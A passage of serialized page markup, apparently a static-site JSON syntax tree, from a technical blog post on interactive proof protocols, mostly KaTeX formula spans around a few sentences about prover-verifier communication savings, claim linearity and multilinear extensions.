hildren":110382},{"className":110381,"style":92897},[3680,21251],[110383],{"type":33,"value":92900},{"type":28,"tag":116,"props":110385,"children":110387},{"className":110386},[3695],[110388],{"type":28,"tag":116,"props":110389,"children":110391},{"className":110390},[3700,21305],[110392,110435],{"type":28,"tag":116,"props":110393,"children":110395},{"className":110394},[3705],[110396,110430],{"type":28,"tag":116,"props":110397,"children":110399},{"className":110398,"style":93192},[3710],[110400],{"type":28,"tag":116,"props":110401,"children":110402},{"style":110089},[110403,110407],{"type":28,"tag":116,"props":110404,"children":110406},{"className":110405,"style":3720},[3719],[],{"type":28,"tag":116,"props":110408,"children":110410},{"className":110409},[3725,3726,3727,3728],[110411],{"type":28,"tag":116,"props":110412,"children":110414},{"className":110413},[3680,3728],[110415,110420,110425],{"type":28,"tag":116,"props":110416,"children":110418},{"className":110417},[3680,21251,3728],[110419],{"type":33,"value":3408},{"type":28,"tag":116,"props":110421,"children":110423},{"className":110422},[3765,3728],[110424],{"type":33,"value":3739},{"type":28,"tag":116,"props":110426,"children":110428},{"className":110427},[3680,3728],[110429],{"type":33,"value":1824},{"type":28,"tag":116,"props":110431,"children":110433},{"className":110432},[21407],[110434],{"type":33,"value":21410},{"type":28,"tag":116,"props":110436,"children":110438},{"className":110437},[3705],[110439],{"type":28,"tag":116,"props":110440,"children":110442},{"className":110441,"style":110130},[3710],[110443],{"type":28,"tag":116,"props":110444,"children":110445},{},[],{"type":28,"tag":116,"props":110447,"children":110449},{"className":110448,"style":3760},[3759],[],{"type":28,"tag":116,"props":110451,"children":110453},{"className":110452},[3765],[110454],{"type":33,"value":3739},{"type":28,"tag":116,"props":110456,"children":110458},{"className":110457,"style":3760},[3759],[],{"type":28,"tag":116,"props":110460,"children":110462},{"className":110461},[3669],[110463,110467,110472],{"type":28,"tag":116,"props":110464,"children":110466},{"className":110465,"style":93694},[3674],[],{"type":28,"tag":116,"props":110468,"children":110470},{"className":110469},[3680],[110471],{"type":33,"value":2794},{"type":28,"tag":116,"props":110473,"children":110475},{"className":110474},[3680,21251],[110476],{"type":33,"value":87},{"type":28,"tag":29,"props":110478,"children":110479},{},[110480,110482,110601,110603,110628],{"type":33,"value":110481},"So the prover only sends ",{"type":28,"tag":98,"props":110483,"children":110485},{"className":110484},[3652,3653],[110486],{"type":28,"tag":116,"props":110487,"children":110489},{"className":110488},[3658],[110490],{"type":28,"tag":116,"props":110491,"children":110493},{"className":110492,"ariaHidden":3664},[3663],[110494,110521],{"type":28,"tag":116,"props":110495,"children":110497},{"className":110496},[3669],[110498,110503,110508,110512,110517],{"type":28,"tag":116,"props":110499,"children":110502},{"className":110500,"style":110501},[3674],"height:0.4306em;",[],{"type":28,"tag":116,"props":110504,"children":110506},{"className":110505},[3680,21251],[110507],{"type":33,"value":87},{"type":28,"tag":116,"props":110509,"children":110511},{"className":110510,"style":3857},[3759],[],{"type":28,"tag":116,"props":110513,"children":110515},{"className":110514},[3862],[110516],{"type":33,"value":373},{"type":28,"tag":116,"props":110518,"children":110520},{"className":110519,"style":3857},[3759],[],{"type":28,"tag":116,"props":110522,"children":110524},{"className":110523},[3669],[110525,110529,110586,110591,110596],{"type":28,"tag":116,"props":110526,"children":110528},{"className":110527,"style":3780},[3674],[],{"type":28,"tag":116,"props":110530,"children":110532},{"className":110531},[3680],[110533,110538],{"type":28,"tag":116,"props":110534,"children":110536},{"className":110535,"style":93149},[3680,21251],[110537],{"type":33,"value":108911},{"type":28,"tag":116,"props":110539,"children":110541},{"className":110540},[3695],[110542],{"type":28,"tag":116,"props":110543,"children":110545},{"className":110544},[3700,21305],[110546,110575],{"type":28,"tag":116,"props":110547,"children":110549},{"className":110548},[3705],[110550,110570],{"type":28,"tag":116,"props":110551,"children":110553},{"className":110552,"style":93192},[3710],[110554],{"type":28,"tag":116,"props":110555,"children":110556},{"style":93196},[110557,110561],{"type":28,"tag":116,"props":110558,"children":110560},{"className":110559,"style":3720},[3719],[],{"type":28,"tag":116,"props":110562,"children":110564},{"className":110563},[3725,3726,3727,3728],[110565],{"type":28,"tag":116,"props":110566,"children":110568},{"className":110567},[3680,21251,3728],[110569],{"type":33,"value":3408},{"type":28,"tag":116,"props":110571,"children":110573},{"className":110572},[21407],[110574],{"type":33,"value":21410},{"type":28,"tag":116,"props":110576,"children":110578},{"className":110577},[3705],[110579],{"type":28,"tag":116,"props":110580,"children":110582},{"className":110581,"style":92746},[3710],[110583],{"type":28,"tag":116,"props":110584,"children":110585},{},[],{"type":28,"tag":116,"props":110587,"children":110589},{"className":110588},[21380],[110590],{"type":33,"value":313},{"type":28,"tag":116,"props":110592,"children":110594},{"className":110593},[3680],[110595],{"type":33,"value":353},{"type":28,"tag":116,"props":110597,"children":110599},{"className":110598},[21401],[110600],{"type":33,"value":1829},{"type":33,"value":110602},", and the verifier recovers ",{"type":28,"tag":98,"props":110604,"children":110606},{"className":110605},[3652,3653],[110607],{"type":28,"tag":116,"props":110608,"children":110610},{"className":110609},[3658],[110611],{"type":28,"tag":116,"props":110612,"children":110614},{"className":110613,"ariaHidden":3664},[3663],[110615],{"type":28,"tag":116,"props":110616,"children":110618},{"className":110617},[3669],[110619,110623],{"type":28,"tag":116,"props":110620,"children":110622},{"className":110621,"style":92578},[3674],[],{"type":28,"tag":116,"props":110624,"children":110626},{"className":110625},[3680,21251],[110627],{"type":33,"value":2893},{"type":33,"value":110629},". This saves 50% on communication costs.",{"type":28,"tag":29,"props":110631,"children":110632},{},[110633],{"type":33,"value":110634},"The next claim in the chain is",{"type":28,"tag":29,"props":110636,"children":110637},{},[110638],{"type":28,"tag":98,"props":110639,"children":110641},{"className":110640},[3652,3653],[110642],{"type":28,"tag":116,"props":110643,"children":110645},{"className":110644},[3658],[110646],{"type":28,"tag":116,"props":110647,"children":110649},{"className":110648,"ariaHidden":3664},[3663],[110650,110729,110874,110900,110927,111005,111031,111128,111164,111242,111278,111366,111458],{"type":28,"tag":116,"props":110651,"children":110653},{"className":110652},[3669],[110654,110659,110716,110720,110725],{"type":28,"tag":116,"props":110655,"children":110658},{"className":110656,"style":110657},[3674],"height:0.8333em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":110660,"children":110662},{"className":110661},[3680],[110663,110668],{"type":28,"tag":116,"props":110664,"children":110666},{"className":110665,"style":92897},[3680,21251],[110667],{"type":33,"value":92900},{"type":28,"tag":116,"props":110669,"children":110671},{"className":110670},[3695],[110672],{"type":28,"tag":116,"props":110673,"children":110675},{"className":110674},[3700,21305],[110676,110705],{"type":28,"tag":116,"props":110677,"children":110679},{"className":110678},[3705],[110680,110700],{"type":28,"tag":116,"props":110681,"children":110683},{"className":110682,"style":93192},[3710],[110684],{"type":28,"tag":116,"props":110685,"children":110686},{"style":110089},[110687,110691],{"type":28,"tag":116,"props":110688,"children":110690},{"className":110689,"style":3720},[3719],[],{"type":28,"tag":116,"props":110692,"children":110694},{"className":110693},[3725,3726,3727,3728],[110695],{"type":28,"tag":116,"props":110696,"children":110698},{"className":110697},[3680,21251,3728],[110699],{"type":33,"value":3408},{"type":28,"tag":116,"props":110701,"children":110703},{"className":110702},[21407],[110704],{"type":33,"value":21410},{"type":28,"tag":116,"props":110706,"children":110708},{"className":110707},[3705],[110709],{"type":28,"tag":116,"props":110710,"children":110712},{"className":110711,"style":92746},[3710],[110713],{"type":28,"tag":116,"props":110714,"children":110715},{},[],{"type":28,"tag":116,"props":110717,"children":110719},{"className":110718,"style":3857},[3759],[],{"type":28,"tag":116,"props":110721,"children":110723},{"className":110722},[3862],[110724],{"type":33,"value":373},{"type":28,"tag":116,"props":110726,"children":110728},{"className":110727,"style":3857},[3759],[],{"type":28,"tag":116,"props":110730,"children":110732},{"className":110731},[3669],[110733,110737,110794,110799,110856,110861,110865,110870],{"type":28,"tag":116,"props":110734,"children":110736},{"className":110735,"style":3780},[3674],[],{"type":28,"tag":116,"props":110738,"children":110740},{"className":110739},[3680],[110741,110746],{"type":28,"tag":116,"props":110742,"children":110744},{"className":110743,"style":93149},[3680,21251],[110745],{"type":33,"value":108911},{"type":28,"tag":116,"props":110747,"children":110749},{"className":110748},[3695],[110750],{"type":28,"tag":116,"props":110751,"children":110753},{"className":110752},[3700,21305],[110754,110783],{"type":28,"tag":116,"props":110755,"children":110757},{"className":110756},[3705],[110758,110778],{"type":28,"tag":116,"props":110759,"children":110761},{"className":110760,"style":93192},[3710],[110762],{"type":28,"tag":116,"props":110763,"children":110764},{"style":93196},[110765,110769],{"type":28,"tag":116,"props":110766,"children":110768},{"className":110767,"style":3720},[3719],[],{"type":28,"tag":116,"props":110770,"children":110772},{"className":110771},[3725,3726,3727,3728],[110773],{"type":28,"tag":116,"props":110774,"children":110776},{"className":110775},[3680,21251,3728],[110777],{"type":33,"value":3408},{"type":28,"tag":116,"props":110779,"children":110781},{"className":110780},[21407],[110782],{"type":33,"value":21410},{"type":28,"tag":116,"props":110784,"children":110786},{"className":110785},[3705],[110787],{"type":28,"tag":116,"props":110788,"children":110790},{"className":110789,"style":92746},[3710],[110791],{"type":28,"tag":116,"props":110792,"children":110793},{},[],{"type":28,"tag":116,"props":110795,"children":110797},{"className":110796},[21380],[110798],{"type":33,"value":313},{"type":28,"tag":116,"props":110800,"children":110802},{"className":110801},[3680],[110803,110808],{"type":28,"tag":116,"props":110804,"children":110806},{"className":110805,"style":92663},[3680,21251],[110807],{"type":33,"value":93482},{"type":28,"tag":116,"props":110809,"children":110811},{"className":110810},[3695],[110812],{"type":28,"tag":116,"props":110813,"children":110815},{"className":110814},[3700,21305],[110816,110845],{"type":28,"tag":116,"props":110817,"children":110819},{"className":110818},[3705],[110820,110840],{"type":28,"tag":116,"props":110821,"children":110823},{"className":110822,"style":93192},[3710],[110824],{"type":28,"tag":116,"props":110825,"children":110826},{"style":109659},[110827,110831],{"type":28,"tag":116,"props":110828,"children":110830},{"className":110829,"style":3720},[3719],[],{"type":28,"tag":116,"props":110832,"children":110834},{"className":110833},[3725,3726,3727,3728],[110835],{"type":28,"tag":116,"props":110836,"children":110838},{"className":110837},[3680,21251,3728],[110839],{"type":33,"value":3408},{"type":28,"tag":116,"props":110841,"children":110843},{"className":110842},[21407],[110844],{"type":33,"value":21410},{"type":28,"tag":116,"props":110846,"children":110848},{"className":110847},[3705],[110849],{"type":28,"tag":116,"props":110850,"children":110852},{"className":110851,"style":92746},[3710],[110853],{"type":28,"tag":116,"props":110854,"children":110855},{},[],{"type":28,"tag":116,"props":110857,"children":110859},{"className":110858},[21401],[110860],{"type":33,"value":1829},{"type":28,"tag":116,"props":110862,"children":110864},{"className":110863,"style":3857},[3759],[],{"type":28,"tag":116,"props":110866,"children":110868},{"className":110867},[3862],[110869],{"type":33,"value":373},{"type":28,"tag":116,"props":110871,"children":110873},{"className":110872,"style":3857},[3759],[],{"type":28,"tag":116,"props":110875,"children":110877},{"className":110876},[3669],[110878,110882,110887,110891,110896],{"type":28,"tag":116,"props":110879,"children":110881},{"className":110880,"style":109815},[3674],[],{"type":28,"tag":116,"props":110883,"children":110885},{"className":110884},[3680,21251],[110886],{"type":33,"value":87},{"type":28,"tag":116,"props":110888,"children":110890},{"className":110889,"style":3760},[3759],[],{"type":28,"tag":116,"props":110892,"children":110894},{"className":110893},[3765],[110895],{"type":33,"value":2268},{"type":28,"tag":116,"props":110897,"children":110899},{"className":110898,"style":3760},[3759],[],{"type":28,"tag":116,"props":110901,"children":110903},{"className":110902},[3669],[110904,110908,110913,110917,110923],{"type":28,"tag":116,"props":110905,"children":110907},{"className":110906,"style":92578},[3674],[],{"type":28,"tag":116,"props":110909,"children":110911},{"className":110910},[3680,21251],[110912],{"type":33,"value":2893},{"type":28,"tag":116,"props":110914,"children":110916},{"className":110915,"style":3760},[3759],[],{"type":28,"tag":116,"props":110918,"children":110920},{"className":110919},[3765],[110921],{"type":33,"value":110922},"⋅",{"type":28,"tag":116,"props":110924,"children":110926},{"className":110925,"style":3760},[3759],[],{"type":28,"tag":116,"props":110928,"children":110930},{"className":110929},[3669],[110931,110935,110992,110996,111001],{"type":28,"tag":116,"props":110932,"children":110934},{"className":110933,"style":109630},[3674],[],{"type":28,"tag":116,"props":110936,"children":110938},{"className":110937},[3680],[110939,110944],{"type":28,"tag":116,"props":110940,"children":110942},{"className":110941,"style":92663},[3680,21251],[110943],{"type":33,"value":93482},{"type":28,"tag":116,"props":110945,"children":110947},{"className":110946},[3695],[110948],{"type":28,"tag":116,"props":110949,"children":110951},{"className":110950},[3700,21305],[110952,110981],{"type":28,"tag":116,"props":110953,"children":110955},{"className":110954},[3705],[110956,110976],{"type":28,"tag":116,"props":110957,"children":110959},{"className":110958,"style":93192},[3710],[110960],{"type":28,"tag":116,"props":110961,"children":110962},{"style":109659},[110963,110967],{"type":28,"tag":116,"props":110964,"children":110966},{"className":110965,"style":3720},[3719],[],{"type":28,"tag":116,"props":110968,"children":110970},{"className":110969},[3725,3726,3727,3728],[110971],{"type":28,"tag":116,"props":110972,"children":110974},{"className":110973},[3680,21251,3728],[110975],{"type":33,"value":3408},{"type":28,"tag":116,"props":110977,"children":110979},{"className":110978},[21407],[110980],{"type":33,"value":21410},{"type":28,"tag":116,"props":110982,"children":110984},{"className":110983},[3705],[110985],{"type":28,"tag":116,"props":110986,"children":110988},{"className":110987,"style":92746},[3710],[110989],{"type":28,"tag":116,"props":110990,"children":110991},{},[],{"type":28,"tag":116,"props":110993,"children":110995},{"className":110994,"style":3857},[3759],[],{"type":28,"tag":116,"props":110997,"children":110999},{"className":110998},[3862],[111000],{"type":33,"value":373},{"type":28,"tag":116,"props":111002,"children":111004},{"className":111003,"style":3857},[3759],[],{"type":28,"tag":116,"props":111006,"children":111008},{"className":111007},[3669],[111009,111013,111018,111022,111027],{"type":28,"tag":116,"props":111010,"children":111012},{"className":111011,"style":109815},[3674],[],{"type":28,"tag":116,"props":111014,"children":111016},{"className":111015},[3680,21251],[111017],{"type":33,"value":87},{"type":28,"tag":116,"props":111019,"children":111021},{"className":111020,"style":3760},[3759],[],{"type":28,"tag":116,"props":111023,"children":111025},{"className":111024},[3765],[111026],{"type":33,"value":2268},{"type":28,"tag":116,"props":111028,"children":111030},{"className":111029,"style":3760},[3759],[],{"type":28,"tag":116,"props":111032,"children":111034},{"className":111033},[3669],[111035,111039,111044,111115,111119,111124],{"type":28,"tag":116,"props":111036,"children":111038},{"className":111037,"style":3780},[3674],[],{"type":28,"tag":116,"props":111040,"children":111042},{"className":111041},[21380],[111043],{"type":33,"value":313},{"type":28,"tag":116,"props":111045,"children":111047},{"className":111046},[3680],[111048,111053],{"type":28,"tag":116,"props":111049,"children":111051},{"className":111050,"style":92897},[3680,21251],[111052],{"type":33,"value":92900},{"type":28,"tag":116,"props":111054,"children":111056},{"className":111055},[3695],[111057],{"type":28,"tag":116,"props":111058,"children":111060},{"className":111059},[3700,21305],[111061,111104],{"type":28,"tag":116,"props":111062,"children":111064},{"className":111063},[3705],[111065,111099],{"type":28,"tag":116,"props":111066,"children":111068},{"className":111067,"style":93192},[3710],[111069],{"type":28,"tag":116,"props":111070,"children":111071},{"style":110089},[111072,111076],{"type":28,"tag":116,"props":111073,"children":111075},{"className":111074,"style":3720},[3719],[],{"type":28,"tag":116,"props":111077,"children":111079},{"className":111078},[3725,3726,3727,3728],[111080],{"type":28,"tag":116,"props":111081,"children":111083},{"className":111082},[3680,3728],[111084,111089,111094],{"type":28,"tag":116,"props":111085,"children":111087},{"className":111086},[3680,21251,3728],[111088],{"type":33,"value":3408},{"type":28,"tag":116,"props":111090,"children":111092},{"className":111091},[3765,3728],[111093],{"type":33,"value":3739},{"type":28,"tag":116,"props":111095,"children":111097},{"className":111096},[3680,3728],[111098],{"type":33,"value":1824},{"type":28,"tag":116,"props":111100,"children":111102},{"className":111101},[21407],[111103],{"type":33,"value":21410},{"type":28,"tag":116,"props":111105,"children":111107},{"className":111106},[3705],[111108],{"type":28,"tag":116,"props":111109,"children":111111},{"className":111110,"style":110130},[3710],[111112],{"type":28,"tag":116,"props":111113,"children":111114},{},[],{"type":28,"tag":116,"props":111116,"children":111118},{"className":111117,"style":3760},[3759],[],{"type":28,"tag":116,"props":111120,"children":111122},{"className":111121},[3765],[111123],{"type":33,"value":3739},{"type":28,"tag":116,"props":111125,"children":111127},{"className":111126,"style":3760},[3759],[],{"type":28,"tag":116,"props":111129,"children":111131},{"className":111130},[3669],[111132,111136,111141,111146,111151,111155,111160],{"type":28,"tag":116,"props":111133,"children":111135},{"className":111134,"style":3780},[3674],[],{"type":28,"tag":116,"props":111137,"children":111139},{"className":111138},[3680],[111140],{"type":33,"value":2794},{"type":28,"tag":116,"props":111142,"children":111144},{"className":111143},[3680,21251],[111145],{"type":33,"value":87},{"type":28,"tag":116,"props":111147,"children":111149},{"className":111148},[21401],[111150],{"type":33,"value":1829},{"type":28,"tag":116,"props":111152,"children":111154},{"className":111153,"style":3760},[3759],[],{"type":28,"tag":116,"props":111156,"children":111158},{"className":111157},[3765],[111159],{"type":33,"value":110922},{"type":28,"tag":116,"props":111161,"children":111163},{"className":111162,"style":3760},[3759],[],{"type":28,"tag":116,"props":111165,"children":111167},{"className":111166},[3669],[111168,111172,111229,111233,111238],{"type":28,"tag":116,"props":111169,"children":111171},{"className":111170,"style":109630},[3674],[],{"type":28,"tag":116,"props":111173,"children":111175},{"className":111174},[3680],[111176,111181],{"type":28,"tag":116,"props":111177,"children":111179},{"className":111178,"style":92663},[3680,21251],[111180],{"type":33,"value":93482},{"type":28,"tag":116,"props":111182,"children":111184},{"className":111183},[3695],[111185],{"type":28,"tag":116,"props":111186,"children":111188},{"className":111187},[3700,21305],[111189,111218],{"type":28,"tag":116,"props":111190,"children":111192},{"className":111191},[3705],[111193,111213],{"type":28,"tag":116,"props":111194,"children":111196},{"className":111195,"style":93192},[3710],[111197],{"type":28,"tag":116,"props":111198,"children":111199},{"style":109659},[111200,111204],{"type":28,"tag":116,"props":111201,"children":111203},{"className":111202,"style":3720},[3719],[],{"type":28,"tag":116,"props":111205,"children":111207},{"className":111206},[3725,3726,3727,3728],[111208],{"type":28,"tag":116,"props":111209,"children":111211},{"className":111210},[3680,21251,3728],[111212],{"type":33,"value":3408},{"type":28,"tag":116,"props":111214,"children":111216},{"className":111215},[21407],[111217],{"type":33,"value":21410},{"type":28,"tag":116,"props":111219,"children":111221},{"className":111220},[3705],[111222],{"type":28,"tag":116,"props":111223,"children":111225},{"className":111224,"style":92746},[3710],[111226],{"type":28,"tag":116,"props":111227,"children":111228},{},[],{"type":28,"tag":116,"props":111230,"children":111232},{"className":111231,"style":3857},[3759],[],{"type":28,"tag":116,"props":111234,"children":111236},{"className":111235},[3862],[111237],{"type":33,"value":373},{"type":28,"tag":116,"props":111239,"children":111241},{"className":111240,"style":3857},[3759],[],{"type":28,"tag":116,"props":111243,"children":111245},{"className":111244},[3669],[111246,111250,111255,111260,111265,111269,111274],{"type":28,"tag":116,"props":111247,"children":111249},{"className":111248,"style":3780},[3674],[],{"type":28,"tag":116,"props":111251,"children":111253},{"className":111252},[3680,21251],[111254],{"type":33,"value":87},{"type":28,"tag":116,"props":111256,"children":111258},{"className":111257},[21380],[111259],{"type":33,"value":313},{"type":28,"tag":116,"props":111261,"children":111263},{"className":111262},[3680],[111264],{"type":33,"value":1824},{"type":28,"tag":116,"props":111266,"children":111268},{"className":111267,"style":3760},[3759],[],{"type":28,"tag":116,"props":111270,"children":111272},{"className":111271},[3765],[111273],{"type":33,"value":3739},{"type":28,"tag":116,"props":111275,"children":111277},{"className":111276,"style":3760},[3759],[],{"type":28,"tag":116,"props":111279,"children":111281},{"className":111280},[3669],[111282,111286,111291,111348,111353,111357,111362],{"type":28,"tag":116,"props":111283,"children":111285},{"className":111284,"style":3780},[3674],[],{"type":28,"tag":116,"props":111287,"children":111289},{"className":111288},[3680],[111290],{"type":33,"value":2794},{"type":28,"tag":116,"props":111292,"children":111294},{"className":111293},[3680],[111295,111300],{"type":28,"tag":116,"props":111296,"children":111298},{"className":111297,"style":92663},[3680,21251],[111299],{"type":33,"value":93482},{"type":28,"tag":116,"props":111301,"children":111303},{"className":111302},[3695],[111304],{"type":28,"tag":116,"props":111305,"children":111307},{"className":111306},[3700,21305],[111308,111337],{"type":28,"tag":116,"props":111309,"children":111311},{"className":111310},[3705],[111312,111332],{"type":28,"tag":116,"props":111313,"children":111315},{"className":111314,"style":93192},[3710],[111316],{"type":28,"tag":116,"props":111317,"children":111318},{"style":109659},[111319,111323],{"type":28,"tag":116,"props":111320,"children":111322},{"className":111321,"style":3720},[3719],[],{"type":28,"tag":116,"props":111324,"children":111326},{"className":111325},[3725,3726,3727,3728],[111327],{"type":28,"tag":116,"props":111328,"children":111330},{"className":111329},[3680,21251,3728],[111331],{"type":33,"value":3408},{"type":28,"tag":116,"props":111333,"children":111335},{"className":111334},[21407],[111336],{"type":33,"value":21410},{"type":28,"tag":116,"props":111338,"children":111340},{"className":111339},[3705],[111341],{"type":28,"tag":116,"props":111342,"children":111344},{"className":111343,"style":92746},[3710],[111345],{"type":28,"tag":116,"props":111346,"children":111347},{},[],{"type":28,"tag":116,"props":111349,"children":111351},{"className":111350},[21401],[111352],{"type":33,"value":1829},{"type":28,"tag":116,"props":111354,"children":111356},{"className":111355,"style":3760},[3759],[],{"type":28,"tag":116,"props":111358,"children":111360},{"className":111359},[3765],[111361],{"type":33,"value":2268},{"type":28,"tag":116,"props":111363,"children":111365},{"className":111364,"style":3760},[3759],[],{"type":28,"tag":116,"props":111367,"children":111369},{"className":111368},[3669],[111370,111374,111445,111449,111454],{"type":28,"tag":116,"props":111371,"children":111373},{"className":111372,"style":110060},[3674],[],{"type":28,"tag":116,"props":111375,"children":111377},{"className":111376},[3680],[111378,111383],{"type":28,"tag":116,"props":111379,"children":111381},{"className":111380,"style":92897},[3680,21251],[111382],{"type":33,"value":92900},{"type":28,"tag":116,"props":111384,"children":111386},{"className":111385},[3695],[111387],{"type":28,"tag":116,"props":111388,"children":111390},{"className":111389},[3700,21305],[111391,111434],{"type":28,"tag":116,"props":111392,"children":111394},{"className":111393},[3705],[111395,111429],{"type":28,"tag":116,"props":111396,"children":111398},{"className":111397,"style":93192},[3710],[111399],{"type":28,"tag":116,"props":111400,"children":111401},{"style":110089},[111402,111406],{"type":28,"tag":116,"props":111403,"children":111405},{"className":111404,"style":3720},[3719],[],{"type":28,"tag":116,"props":111407,"children":111409},{"className":111408},[3725,3726,3727,3728],[111410],{"type":28,"tag":116,"props":111411,"children":111413},{"className":111412},[3680,3728],[111414,111419,111424],{"type":28,"tag":116,"props":111415,"children":111417},{"className":111416},[3680,21251,3728],[111418],{"type":33,"value":3408},{"type":28,"tag":116,"props":111420,"children":111422},{"className":111421},[3765,3728],[111423],{"type":33,"value":3739},{"type":28,"tag":116,"props":111425,"children":111427},{"className":111426},[3680,3728],[111428],{"type":33,"value":1824},{"type":28,"tag":116,"props":111430,"children":111432},{"className":111431},[21407],[111433],{"type":33,"value":21410},{"type":28,"tag":116,"props":111435,"children":111437},{"className":111436},[3705],[111438],{"type":28,"tag":116,"props":111439,"children":111441},{"className":111440,"style":110130},[3710],[111442],{"type":28,"tag":116,"props":111443,"children":111444},{},[],{"type":28,"tag":116,"props":111446,"children":111448},{"className":111447,"style":3760},[3759],[],{"type":28,"tag":116,"props":111450,"children":111452},{"className":111451},[3765],[111453],{"type":33,"value":110922},{"type":28,"tag":116,"props":111455,"children":111457},{"className":111456,"style":3760},[3759],[],{"type":28,"tag":116,"props":111459,"children":111461},{"className":111460},[3669],[111462,111466],{"type":28,"tag":116,"props":111463,"children":111465},{"className":111464,"style":109630},[3674],[],{"type":28,"tag":116,"props":111467,"children":111469},{"className":111468},[3680],[111470,111475],{"type":28,"tag":116,"props":111471,"children":111473},{"className":111472,"style":92663},[3680,21251],[111474],{"type":33,"value":93482},{"type":28,"tag":116,"props":111476,"children":111478},{"className":111477},[3695],[111479],{"type":28,"tag":116,"props":111480,"children":111482},{"className":111481},[3700,21305],[111483,111512],{"type":28,"tag":116,"props":111484,"children":111486},{"className":111485},[3705],[111487,111507],{"type":28,"tag":116,"props":111488,"children":111490},{"className":111489,"style":93192},[3710],[111491],{"type":28,"tag":116,"props":111492,"children":111493},{"style":109659},[111494,111498],{"type":28,"tag":116,"props":111495,"children":111497},{"className":111496,"style":3720},[3719],[],{"type":28,"tag":116,"props":111499,"children":111501},{"className":111500},[3725,3726,3727,3728],[111502],{"type":28,"tag":116,"props":111503,"children":111505},{"className":111504},[3680,21251,3728],[111506],{"type":33,"value":3408},{"type":28,"tag":116,"props":111508,"children":111510},{"className":111509},[21407],[111511],{"type":33,"value":21410},{"type":28,"tag":116,"props":111513,"children":111515},{"className":111514},[3705],[111516],{"type":28,"tag":116,"props":111517,"children":111519},{"className":111518,"style":92746},[3710],[111520],{"type":28,"tag":116,"props":111521,"children":111522},{},[],{"type":28,"tag":29,"props":111524,"children":111525},{},[111526,111527,111623,111625,111650,111652,111677],{"type":33,"value":45761},{"type":28,"tag":4995,"props":111528,"children":111529},{},[111530,111532],{"type":33,"value":111531},"linear in ",{"type":28,"tag":98,"props":111533,"children":111535},{"className":111534},[3652,3653],[111536],{"type":28,"tag":116,"props":111537,"children":111539},{"className":111538},[3658],[111540],{"type":28,"tag":116,"props":111541,"children":111543},{"className":111542,"ariaHidden":3664},[3663],[111544],{"type":28,"tag":116,"props":111545,"children":111547},{"className":111546},[3669],[111548,111552],{"type":28,"tag":116,"props":111549,"children":111551},{"className":111550,"style":110060},[3674],[],{"type":28,"tag":116,"props":111553,"children":111555},{"className":111554},[3680],[111556,111561],{"type":28,"tag":116,"props":111557,"children":111559},{"className":111558,"style":92897},[3680,21251],[111560],{"type":33,"value":92900},{"type":28,"tag":116,"props":111562,"children":111564},{"className":111563},[3695],[111565],{"type":28,"tag":116,"props":111566,"children":111568},{"className":111567},[3700,21305],[111569,111612],{"type":28,"tag":116,"props":111570,"children":111572},{"className":111571},[3705],[111573,111607],{"type":28,"tag":116,"props":111574,"children":111576},{"className":111575,"style":93192},[3710],[111577],{"type":28,"tag":116,"props":111578,"children":111579},{"style":110089},[111580,111584],{"type":28,"tag":116,"props":111581,"children":111583},{"className":111582,"style":3720},[3719],[],{"type":28,"tag":116,"props":111585,"children":111587},{"className":111586},[3725,3726,3727,3728],[111588],{"type":28,"tag":116,"props":111589,"children":111591},{"className":111590},[3680,3728],[111592,111597,111602],{"type":28,"tag":116,"props":111593,"children":111595},{"className":111594},[3680,21251,3728],[111596],{"type":33,"value":3408},{"type":28,"tag":116,"props":111598,"children":111600},{"className":111599},[3765,3728],[111601],{"type":33,"value":3739},{"type":28,"tag":116,"props":111603,"children":111605},{"className":111604},[3680,3728],[111606],{"type":33,"value":1824},{"type":28,"tag":116,"props":111608,"children":111610},{"className":111609},[21407],[111611],{"type":33,"value":21410},{"type":28,"tag":116,"props":111613,"children":111615},{"className":111614},[3705],[111616],{"type":28,"tag":116,"props":111617,"children":111619},{"className":111618,"style":110130},[3710],[111620],{"type":28,"tag":116,"props":111621,"children":111622},{},[],{"type":33,"value":111624},"! By induction, the final claim is linear in the original ",{"type":28,"tag":98,"props":111626,"children":111628},{"className":111627},[3652,3653],[111629],{"type":28,"tag":116,"props":111630,"children":111632},{"className":111631},[3658],[111633],{"type":28,"tag":116,"props":111634,"children":111636},{"className":111635,"ariaHidden":3664},[3663],[111637],{"type":28,"tag":116,"props":111638,"children":111640},{"className":111639},[3669],[111641,111645],{"type":28,"tag":116,"props":111642,"children":111644},{"className":111643,"style":21246},[3674],[],{"type":28,"tag":116,"props":111646,"children":111648},{"className":111647,"style":92897},[3680,21251],[111649],{"type":33,"value":92900},{"type":33,"value":111651},". If ",{"type":28,"tag":98,"props":111653,"children":111655},{"className":111654},[3652,3653],[111656],{"type":28,"tag":116,"props":111657,"children":111659},{"className":111658},[3658],[111660],{"type":28,"tag":116,"props":111661,"children":111663},{"className":111662,"ariaHidden":3664},[3663],[111664],{"type":28,"tag":116,"props":111665,"children":111667},{"className":111666},[3669],[111668,111672],{"type":28,"tag":116,"props":111669,"children":111671},{"className":111670,"style":21246},[3674],[],{"type":28,"tag":116,"props":111673,"children":111675},{"className":111674,"style":92897},[3680,21251],[111676],{"type":33,"value":92900},{"type":33,"value":111678}," isn't in the transcript, we can solve for it.",{"type":28,"tag":75,"props":111680,"children":111682},{"id":111681},"multilinear-extensions-mles",[111683],{"type":33,"value":111684},"Multilinear Extensions (MLEs)",{"type":28,"tag":29,"props":111686,"children":111687},{},[111688,111690,111775],{"type":33,"value":111689},"An MLE is just the polynomial view of a table over ",{"type":28,"tag":98,"props":111691,"children":111693},{"className":111692},[3652,3653],[111694],{"type":28,"tag":116,"props":111695,"children":111697},{"className":111696},[3658],[111698],{"type":28,"tag":116,"props":111699,"children":111701},{"className":111700,"ariaHidden":3664},[3663],[111702],{"type":28,"tag":116,"props":111703,"children":111705},{"className":111704},[3669],[111706,111710,111715,111720,111725,111729,111734],{"type":28,"tag":116,"props":111707,"children":111709},{"className":111708,"style":3780},[3674],[],{"type":28,"tag":116,"props":111711,"children":111713},{"className":111712},[21380],[111714],{"type":33,"value":76238},{"type":28,"tag":116,"props":111716,"children":111718},{"className":111717},[3680],[111719],{"type":33,"value":353},{"type":28,"tag":116,"props":111721,"children":111723},{"className":111722},[3791],[111724],{"type":33,"value":3794},{"type":28,"tag":116,"props":111726,"children":111728},{"className":111727,"style":3798},[3759],[],{"type":28,"tag":116,"props":111730,"children":111732},{"className":111731},[3680],[111733],{"type":33,"value":1824},{"type":28,"tag":116,"props":111735,"children":111737},{"className":111736},[21401],[111738,111743],{"type":28,"tag":116,"props":111739,"children":111741},{"className":111740},[21401],[111742],{"type":33,"value":885},{"type":28,"tag":116,"props":111744,"children":111746},{"className":111745},[3695],[